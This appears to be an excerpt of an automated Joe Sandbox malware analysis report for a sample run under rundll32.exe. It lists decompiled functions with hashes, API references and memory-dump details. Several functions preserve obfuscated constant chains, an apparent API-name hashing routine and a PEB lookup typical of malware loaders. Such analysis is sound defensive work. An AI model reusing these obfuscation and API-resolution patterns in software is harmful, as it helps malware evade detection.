Instruction Fuzzy Hash: 9D41FEB1D0021DEBDF58CFA5C98A5EEBFB1FB48314F208198D511B62A0D7B90A46CF94

Uniqueness

Uniqueness Score: -1.00%

Function 001F8CA3, Relevance: .1, Instructions: 95
COMMONCrypto

Download Yara Rule

C-Code - Quality: 15%

			E001F8CA3(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v556;
				void* _t89;
				intOrPtr* _t91;
				signed int _t95;
				signed int _t96;
				signed int _t109;

				_v36 = 0;
				_v32 = 0x29d5;
				_v32 = _v32 ^ 0x626c2200;
				_v32 = _v32 ^ 0x626c072c;
				_v16 = 0x8a53;
				_v16 = _v16 ^ 0xc3c6da5f;
				_v16 = _v16 << 2;
				_v16 = _v16 | 0xabb7532b;
				_v16 = _v16 ^ 0xafbf763a;
				_v20 = 0x925b;
				_t95 = 0x78;
				_v20 = _v20 / _t95;
				_t96 = 0x72;
				_v20 = _v20 / _t96;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x0000e1f3;
				_v24 = 0x334;
				_v24 = _v24 + 0x5249;
				_t109 = 0x5c;
				_push(_t96);
				_v24 = _v24 * 0x21;
				_v24 = _v24 ^ 0x000b38a4;
				_v28 = 0x9636;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x00001dee;
				_v12 = 0xb2e5;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x878b803c;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x78b81fbb;
				_v8 = 0xb95e;
				_v8 = _v8 >> 7;
				_v8 = _v8 / _t109;
				_v8 = _v8 * 0x1d;
				_v8 = _v8 ^ 0x00001e7b;
				_t89 = E0020372F( &_v556, _v32, _v16);
				_pop(0);
				if(_t89 != 0) {
					_t91 =  &_v556;
					if(_v556 != 0) {
						while( *_t91 != _t109) {
							_t91 = _t91 + 2;
							if( *_t91 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						 *((short*)(_t91 + 2)) = 0;
					}
					L6:
					_push(0);
					_push(0);
					_push(_v8);
					_push(_v12);
					_push(0);
					_push( &_v556);
					_push( &_v36);
					_push(_v28);
					E0020C50B(_v20, _v24);
				}
				return _v36;
			}

0x001f8cb1
0x001f8cb4
0x001f8cbb
0x001f8cc2
0x001f8cc9
0x001f8cd0
0x001f8cd7
0x001f8cdb
0x001f8ce2
0x001f8ce9
0x001f8cf6
0x001f8cfb
0x001f8d03
0x001f8d08
0x001f8d0d
0x001f8d11
0x001f8d18
0x001f8d1f
0x001f8d2a
0x001f8d2b
0x001f8d32
0x001f8d35
0x001f8d3c
0x001f8d43
0x001f8d47
0x001f8d4e
0x001f8d55
0x001f8d59
0x001f8d60
0x001f8d64
0x001f8d6b
0x001f8d72
0x001f8d7b
0x001f8d82
0x001f8d85
0x001f8d92
0x001f8d98
0x001f8d9b
0x001f8d9d
0x001f8daa
0x001f8dac
0x001f8db1
0x001f8db7
0x00000000
0x00000000
0x001f8db9
0x00000000
0x001f8db7
0x001f8dbd
0x001f8dbd
0x001f8dc1
0x001f8dc1
0x001f8dc2
0x001f8dc3
0x001f8dcf
0x001f8dd2
0x001f8dd3
0x001f8dd7
0x001f8dd8
0x001f8de1
0x001f8de6
0x001f8df1

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6b1417c14184671c41ad61bda5044eabbd7f3f842d6e1b0d6b422026d02d4ca
Instruction ID: 1cb148fc4a8d3a20fa5b6beae4291ca3071bf73bcfd410c9fb246ee495e8642b
Opcode Fuzzy Hash: b6b1417c14184671c41ad61bda5044eabbd7f3f842d6e1b0d6b422026d02d4ca
Instruction Fuzzy Hash: 3E410071D0121DABDF18DFA5D98A9EEFBB4FF44304F20819AD011A62A0E7B45B44CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00298217, Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6b1417c14184671c41ad61bda5044eabbd7f3f842d6e1b0d6b422026d02d4ca
Instruction ID: 1175baaec35d9cb573060a5704acd47329f2a6867a8f7bb2d2034d02c9189167
Opcode Fuzzy Hash: b6b1417c14184671c41ad61bda5044eabbd7f3f842d6e1b0d6b422026d02d4ca
Instruction Fuzzy Hash: 20413472D11209EBDF18DFA5D94A9EEFBB4FB44304F20819AD011A7290D7B45B44CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001F492A, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7eaa5e1d21be338b1cd6ce6653cfaaa8da155c2e378965c531edad88466e545
Instruction ID: ea839725f0d726e55cde6085a92a742a66a922ca055eed7031002e90cfe70806
Opcode Fuzzy Hash: d7eaa5e1d21be338b1cd6ce6653cfaaa8da155c2e378965c531edad88466e545
Instruction Fuzzy Hash: 4E313372D0020CBFDF05DF95CC4A8EEBBB5FB48318F508158F91866260D3B59A659F80

Uniqueness

Uniqueness Score: -1.00%

Function 00293E9E, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2425e6d5ceedebba44362510300844ff923e7cc47c55a2d902ab7c1a58364ed5
Instruction ID: 962ffb6f535e8458c447f63437dfcca18ae632718504714b9021b27f2c06de3f
Opcode Fuzzy Hash: 2425e6d5ceedebba44362510300844ff923e7cc47c55a2d902ab7c1a58364ed5
Instruction Fuzzy Hash: AB311372D0020DBFDF05DF95CC4A8EEBBB5FB48308F508159F91866220D3B59A659F90

Uniqueness

Uniqueness Score: -1.00%

Function 0020C424, Relevance: .1, Instructions: 67
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0020C424(signed short* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t48;
				signed int _t55;
				signed int _t57;
				signed int _t60;
				signed int _t67;
				signed int _t70;
				signed short* _t72;

				_push(_a4);
				_t72 = __edx;
				_push(__edx);
				E001F56B2(_t48);
				_v8 = 0xd4f3;
				_t60 = 0x53;
				_v8 = _v8 / _t60;
				_v8 = _v8 ^ 0x00000290;
				_v4 = 0x6d95;
				_v4 = _v4 >> 5;
				_v4 = _v4 >> 5;
				_v4 = _v4 ^ 0x0000001d;
				_v4 = 0xb2ff;
				_v4 = _v4 * 0x7b;
				_v4 = _v4 ^ 0x00560095;
				if( *((intOrPtr*)(__edx)) != 0) {
					do {
						_t57 = _v8;
						_v4 = 0x6d95;
						_v4 = _v4 >> 5;
						_v4 = _v4 >> 5;
						_v4 = _v4 ^ 0x0000001d;
						_v4 = 0xb2ff;
						_t67 = _v8 << _v4;
						_v4 = _v4 * 0x7b;
						_v4 = _v4 ^ 0x00560095;
						_t55 =  *_t72 & 0x0000ffff;
						_t70 = _v8 << _v4;
						if(_t55 >= 0x41 && _t55 <= 0x5a) {
							_t55 = _t55 + 0x20;
						}
						_v8 = _t55;
						_t72 =  &(_t72[1]);
						_v8 = _v8 + _t67;
						_v8 = _v8 + _t70;
						_v8 = _v8 - _t57;
					} while ( *_t72 != 0);
				}
				return _v8;
			}

0x0020c428
0x0020c42c
0x0020c42e
0x0020c430
0x0020c435
0x0020c44a
0x0020c44d
0x0020c451
0x0020c459
0x0020c461
0x0020c466
0x0020c46b
0x0020c470
0x0020c47d
0x0020c481
0x0020c48c
0x0020c490
0x0020c490
0x0020c494
0x0020c49c
0x0020c4a1
0x0020c4a6
0x0020c4b3
0x0020c4c0
0x0020c4c2
0x0020c4c6
0x0020c4d6
0x0020c4d9
0x0020c4de
0x0020c4e5
0x0020c4e5
0x0020c4e8
0x0020c4ec
0x0020c4ef
0x0020c4f3
0x0020c4f7
0x0020c4fb
0x0020c501
0x0020c50a

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d7db5a319c0fddcc07e6312fb913f27f215fefaf9637745451133b23df0a8b
Instruction ID: f33499297eaa941dc1b61f1bede37915c0a1b2579e52aa5f2ec85ff2af9aa767
Opcode Fuzzy Hash: e3d7db5a319c0fddcc07e6312fb913f27f215fefaf9637745451133b23df0a8b
Instruction Fuzzy Hash: 9821E4B25093429FD314CF22E54941BBBE5FBD0764F11C92EF09496290D3B999488FA3

Uniqueness

Uniqueness Score: -1.00%

Function 002AB998, Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5452d8b446ec4a71b856e7f8f84a881ad408c4542bf4732ff34cf9da4b5df453
Instruction ID: fb274cd357d8ebb207e991d4ee95844cd923b92cc617cb6f5f2e1843c6d755d5
Opcode Fuzzy Hash: 5452d8b446ec4a71b856e7f8f84a881ad408c4542bf4732ff34cf9da4b5df453
Instruction Fuzzy Hash: CD21F0B29093429FD314CF22E54941BBBE5EBC0764F11C82EF0A496251D3B99948CFA3

Uniqueness

Uniqueness Score: -1.00%

Function 001FCB42, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd9506c5977c50594bd5f752337eb03357f3e82f09bf403050e7fcfdd1065ac3
Instruction ID: 542dbcc73ec6727c4d0d918427d833b8eefa31c9c7c9880257018a47ebb5a241
Opcode Fuzzy Hash: bd9506c5977c50594bd5f752337eb03357f3e82f09bf403050e7fcfdd1065ac3
Instruction Fuzzy Hash: 9E212471D01209EBEF14DFE5C94A8DEBFB5EF44314F108189E514A6290D7B55A60CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0029C0B6, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03ca15339b714eed89d9c015f28285e42f9fddcb8a9713f7a07ff60f32175107
Instruction ID: ea1e85c1063315f2b0f966ca9bca776466b6b2e31630ee0c253c3c9000dd8ac9
Opcode Fuzzy Hash: 03ca15339b714eed89d9c015f28285e42f9fddcb8a9713f7a07ff60f32175107
Instruction Fuzzy Hash: 42214271E00209EBEF58EFE5C90A8DEBFB5EF44314F108189E918A6290D7B55A20CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001FD013, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9719f3968983544ab734e401a60d23a5ebbbcf226f822f2d88d8312b4e9b81
Instruction ID: a181c4d8ce7e39284534d065d08a3abc1e1ec03579c98c172b3039bba7c843ad
Opcode Fuzzy Hash: ca9719f3968983544ab734e401a60d23a5ebbbcf226f822f2d88d8312b4e9b81
Instruction Fuzzy Hash: 53218E71E00208FBEB08DFA5D94A9DEBBB6FB44314F10C09AE514AB281D7B55B548F81

Uniqueness

Uniqueness Score: -1.00%

Function 0029C587, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f6aa4b273cc5c9490c56f59c46c6231fa3dd83b801c2670da278c59944af392
Instruction ID: 8cec8b238f07904219d119df18cdac41e2ecd551c2010599a1799312591e8245
Opcode Fuzzy Hash: 6f6aa4b273cc5c9490c56f59c46c6231fa3dd83b801c2670da278c59944af392
Instruction Fuzzy Hash: 75214F71E00208FBDB14DFA5D94A9DEBBB5FB45304F10C099E514AB281D7B55B548F41

Uniqueness

Uniqueness Score: -1.00%

Function 001F1D4D, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001F1D4D() {

				return  *[fs:0x30];
			}

0x001f1d53

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 002912C1, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00218330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 00218361
GetSystemMetrics.USER32(00000000), ref: 0021839D
GetSystemMetrics.USER32(00000001), ref: 002183A8

Strings

GetMonitorInfo, xrefs: 00218348
/}Au, xrefs: 0021839D, 002183A8
DISPLAY, xrefs: 002183C9

Memory Dump Source

Source File: 00000007.00000002.2091670626.0000000000214000.00000020.00020000.sdmp, Offset: 00214000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_214000_rundll32.jbxd

Similarity

API ID: MetricsSystem$InfoMonitor
String ID: /}Au$DISPLAY$GetMonitorInfo
API String ID: 4250584380-1428758730
Opcode ID: 4f8ac3bae278d457880a653cb992a3398fafd19bb5cb5dd4e32239668c986029
Instruction ID: 172e40f59564dcb8563b4999de680ec7fb72c70c11a2277bf1ef92674b9e25b2
Opcode Fuzzy Hash: 4f8ac3bae278d457880a653cb992a3398fafd19bb5cb5dd4e32239668c986029
Instruction Fuzzy Hash: 2D1126716113059FD320CF20AC887F7B7E9EB15B11F444629FD66D7240EBB1A894CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 002185AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 002185E5
GetSystemMetrics.USER32(00000000), ref: 0021860A
GetSystemMetrics.USER32(00000001), ref: 00218615

Strings

/}Au, xrefs: 0021860A, 00218615
EnumDisplayMonitors, xrefs: 002185C4

Memory Dump Source

Source File: 00000007.00000002.2091670626.0000000000214000.00000020.00020000.sdmp, Offset: 00214000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_214000_rundll32.jbxd

Similarity

API ID: MetricsSystem$DisplayEnumMonitors
String ID: /}Au$EnumDisplayMonitors
API String ID: 1389147845-1105134141
Opcode ID: 60cee6f13cff95f270646e590a5f07f46bc30c4a50afa1d439d885f0f88f8583
Instruction ID: d0c04baa11d1287f61516844bab5cba2923f97039bf2fa87864a44bc223f9ba0
Opcode Fuzzy Hash: 60cee6f13cff95f270646e590a5f07f46bc30c4a50afa1d439d885f0f88f8583
Instruction Fuzzy Hash: 5F311DB2A1124AAFDB10DFA4DC88AFF77FCEB69341F004526E915D3200EB74D9548BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00218404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00218471
GetSystemMetrics.USER32(00000001), ref: 0021847C

Strings

DISPLAY, xrefs: 0021849D
/}Au, xrefs: 00218471, 0021847C
GetMonitorInfoA, xrefs: 0021841C

Memory Dump Source

Source File: 00000007.00000002.2091670626.0000000000214000.00000020.00020000.sdmp, Offset: 00214000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_214000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoA
API String ID: 4116985748-2822609925
Opcode ID: be221e41bdad95440d8853c7ee9c132ffef513edce043604e70c1808b8eb1378
Instruction ID: 23f5fc6f8418de6ba931b7e4c65de8b173414d93a07a7f9fa32f09d9b07d1187
Opcode Fuzzy Hash: be221e41bdad95440d8853c7ee9c132ffef513edce043604e70c1808b8eb1378
Instruction Fuzzy Hash: 2311E6316113069FD720DF60EC8CBE7B7E8EB15721F404529ED96DB240DF70A8948BA5

Uniqueness

Uniqueness Score: -1.00%

Function 002184D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00218545
GetSystemMetrics.USER32(00000001), ref: 00218550

Strings

GetMonitorInfoW, xrefs: 002184F0
/}Au, xrefs: 00218545, 00218550
DISPLAY, xrefs: 00218571

Memory Dump Source

Source File: 00000007.00000002.2091670626.0000000000214000.00000020.00020000.sdmp, Offset: 00214000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_214000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoW
API String ID: 4116985748-1558784340
Opcode ID: a87575b5b51dbbea8ccd205412fa6d14db69192465392240c01ff0b22114250c
Instruction ID: 510ba85849c5a72174e837866951b5757f727b021087c46ee00663d5037fbbd2
Opcode Fuzzy Hash: a87575b5b51dbbea8ccd205412fa6d14db69192465392240c01ff0b22114250c
Instruction Fuzzy Hash: EA112931A11705AFD720CF619C88BE7B7E9EB26311F85453AED05C7240DB70A884CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00218298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 002182E6
GetSystemMetrics.USER32(00000001), ref: 002182F8

Strings

MonitorFromPoint, xrefs: 002182AA
/}Au, xrefs: 002182E6, 002182F8

Memory Dump Source

Source File: 00000007.00000002.2091670626.0000000000214000.00000020.00020000.sdmp, Offset: 00214000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_214000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromPoint
API String ID: 4116985748-3670600901
Opcode ID: f3d40ca4a7b0233472d0e784a67a4e4b6990e7587ad96a80366a3047f015474c
Instruction ID: 169a653fbb3972af6742d9e16e4454b0d916e189e04df7a2683021ab52af5d40
Opcode Fuzzy Hash: f3d40ca4a7b0233472d0e784a67a4e4b6990e7587ad96a80366a3047f015474c
Instruction Fuzzy Hash: DA01D631611309AFDB004F50ECCCBDEBBD5EB60B62F884165F9248B211CB71ACA08BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00218170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 002181C1
GetSystemMetrics.USER32(00000001), ref: 002181CD

Strings

MonitorFromRect, xrefs: 00218185
/}Au, xrefs: 002181C1, 002181CD

Memory Dump Source

Source File: 00000007.00000002.2091670626.0000000000214000.00000020.00020000.sdmp, Offset: 00214000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_214000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromRect
API String ID: 4116985748-120404372
Opcode ID: 1136ee8dd261537087bf96447e46776ee3cc0429cb4979518c4750bfc5d96b26
Instruction ID: 5ad4b953ad4d4e89a2de04d157841fa1026514d768a890ab872957a0ce4f6488
Opcode Fuzzy Hash: 1136ee8dd261537087bf96447e46776ee3cc0429cb4979518c4750bfc5d96b26
Instruction Fuzzy Hash: 5A014F32220316AFD7109F14ECCDB97B7D5E760392F948166ED08CB202DA729C958BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00252B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00252B7C
DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00252BA9
DdeGetLastError.USER32(00000015), ref: 00252BBB
DdeFreeStringHandle.USER32(00000015,?), ref: 00252BCD

Memory Dump Source

Source File: 00000007.00000002.2091670626.0000000000214000.00000020.00020000.sdmp, Offset: 00214000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_214000_rundll32.jbxd

Similarity

API ID: HandleString$ClientCreateErrorFreeLastTransaction
String ID:
API String ID: 2421758087-0
Opcode ID: ecaeac756b1e32bdc30959c7325e3f16fd8bb342d20ec88cb9427b52b94c7b7c
Instruction ID: b44f9fb9308451609f5c39923414f088c329a3fd67c82f195c74c1a865eb8e3c
Opcode Fuzzy Hash: ecaeac756b1e32bdc30959c7325e3f16fd8bb342d20ec88cb9427b52b94c7b7c
Instruction Fuzzy Hash: 1D2136742142409FDB40DF68C8C5F6AB7E8AB49312F148195FD88CF2A6D771EC48CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00251428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON

Download Yara Rule

APIs

DdeQueryConvInfo.USER32(?,?,00000060), ref: 002514BF

Strings

0%, xrefs: 00251607
`, xrefs: 00251498

Memory Dump Source

Source File: 00000007.00000002.2091670626.0000000000214000.00000020.00020000.sdmp, Offset: 00214000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_214000_rundll32.jbxd

Similarity

API ID: ConvInfoQuery
String ID: 0%$`
API String ID: 701148680-2321722122
Opcode ID: 772ad113240390b36e41737608bc32b5e02306051df46ff7101b40e2fa0287ae
Instruction ID: 10a495c50e74f360089e484614d7ef9e2be705bfa3d56d456cc41df0861d9fdb
Opcode Fuzzy Hash: 772ad113240390b36e41737608bc32b5e02306051df46ff7101b40e2fa0287ae
Instruction Fuzzy Hash: 6C51A576A2021A9FCB14DE6CD9C86AE73B9EB48352F144020FD16D7344DA30DD39CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 002180E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 00218110

Strings

/}Au, xrefs: 002180FD, 0021810A, 00218110
GetSystemMetrics, xrefs: 002180F8

Memory Dump Source

Source File: 00000007.00000002.2091670626.0000000000214000.00000020.00020000.sdmp, Offset: 00214000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_214000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$GetSystemMetrics
API String ID: 4116985748-3773086709
Opcode ID: dfddcf9a21a5ff4f103ed7238080159f8376c83fb3f39d476a8ed789ea537502
Instruction ID: 84600b4a6b8959a9e002de276fcc3c6a3e9fae10b2c3708c10b31144ad743c35
Opcode Fuzzy Hash: dfddcf9a21a5ff4f103ed7238080159f8376c83fb3f39d476a8ed789ea537502
Instruction Fuzzy Hash: 48F090321352467EDB104B34ADCD7A275CAA776330FA04B21E52D462D5CF7988E68258

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2796 Parent PID: 2792 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	4.2%
Signature Coverage:	0%
Total number of Nodes:	264
Total number of Limit Nodes:	15

Executed Functions

Function 0041492A, Relevance: 1.6, APIs: 1, Instructions: 81
fileCOMMONCrypto

Download Yara Rule

C-Code - Quality: 34%

			E0041492A(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, long _a20, intOrPtr _a24, WCHAR* _a32, long _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t61;
				void* _t73;
				signed int _t76;
				signed int _t77;
				long _t84;
				long _t85;

				_push(_a48);
				_t84 = __edx;
				_push(_a44);
				_t85 = __ecx;
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E004156B2(_t61);
				_v32 = 0x27f13a;
				_v28 = 0x4c0b57;
				_v24 = 0;
				_v12 = 0x7aa4;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0xb16472e1;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x01635afc;
				_v20 = 0x7b28;
				_t76 = 0x76;
				_v20 = _v20 / _t76;
				_t77 = 0x7f;
				_push(0xf9b1620b);
				_v20 = _v20 * 0xf;
				_v20 = _v20 ^ 0x000069c5;
				_v8 = 0xb1fe;
				_v8 = _v8 << 6;
				_v8 = _v8 >> 7;
				_v8 = _v8 + 0xffff5bfb;
				_v8 = _v8 ^ 0xffffddd5;
				_v16 = 0xa71b;
				_v16 = _v16 >> 9;
				_push(0x9baba576);
				_v16 = _v16 / _t77;
				_v16 = _v16 ^ 0x00004cca;
				E004204D5(0x16d, _v16 % _t77);
				_t73 = CreateFileW(_a32, _a20, _t84, 0, _t85, _a36, 0); // executed
				return _t73;
			}

0x00414933
0x00414938
0x0041493a
0x0041493d
0x0041493f
0x00414942
0x00414945
0x00414948
0x00414949
0x0041494c
0x0041494f
0x00414950
0x00414953
0x00414956
0x00414959
0x0041495a
0x0041495b
0x00414960
0x0041496a
0x00414973
0x00414976
0x0041497d
0x00414981
0x00414988
0x0041498c
0x00414993
0x0041499f
0x004149a4
0x004149ad
0x004149ae
0x004149b6
0x004149b9
0x004149c0
0x004149c7
0x004149cb
0x004149cf
0x004149d6
0x004149dd
0x004149e4
0x004149ed
0x004149f2
0x004149fa
0x00414a0d
0x00414a22
0x00414a2a

APIs

CreateFileW.KERNEL32(00000013,004C0B57,?,00000000,190550B3,00000010,00000000), ref: 00414A22

Memory Dump Source

Source File: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000008.00000002.2093643430.0000000000431000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2093654473.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d7eaa5e1d21be338b1cd6ce6653cfaaa8da155c2e378965c531edad88466e545
